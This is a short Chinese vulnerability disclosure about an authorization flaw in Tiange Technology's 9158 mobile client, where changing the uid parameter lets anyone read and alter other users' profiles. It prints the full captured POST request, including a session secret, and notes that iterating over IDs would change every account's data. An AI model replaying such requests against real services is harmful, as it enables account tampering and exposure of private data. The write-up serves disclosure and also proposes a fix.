天格科技某处越权漏洞可修改任意账户资料 - 网

天格科技某处越权 漏洞 可修改任意账户资料

问题存在于天格科技的苹果客户端。安卓下目测存在同样的问题。 下载 方式位于http://mobile.9158.com/ 或直接91助手搜索9158 进入客户端，注册帐号。我们点击个人资料  

我们看下数据包  

发现了用户ID的参数，而在首页，我发现了9158公司VIP销售助理的ID  

我们把ID改为30400试试  

可以看到，成功读取了该销售助理的信息，包括不对外公开的登录用户名 那么我们继续尝试更改信息，点击保存  

POST /user/updateInfo_new. asp x? HTTP/1.1 Host: mobile.9158.com Proxy-Connection: keep-alive Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Accept-Language: zh-cn Accept: */* Pragma: no-cache Content-Length: 827 Connection: keep-alive User-Agent: ChatRoom/1.0.7 CFNetwork/609.1.4 Darwin/13.0.0 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="uid" 30400 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="secret" d37ab3012c38a3ad1b96e90dffc1d0cc --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="city" o??Y --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="name" VIP?úê??úàí --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="gender" 0 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="birthday" 19910101 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="province" ???- --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw

我把用户名加了个句号，发现成功更改掉了。  

gender是性别，默认不可更改，但是通过改数据可以实现，0为女，1为男。 至于uid不用解释了吧。 如果我把ID遍历一遍，那么全站的用户信息都会被改掉了。  

修复方案：

添加接口认证

查看更多关于天格科技某处越权漏洞可修改任意账户资料 - 网的详细内容...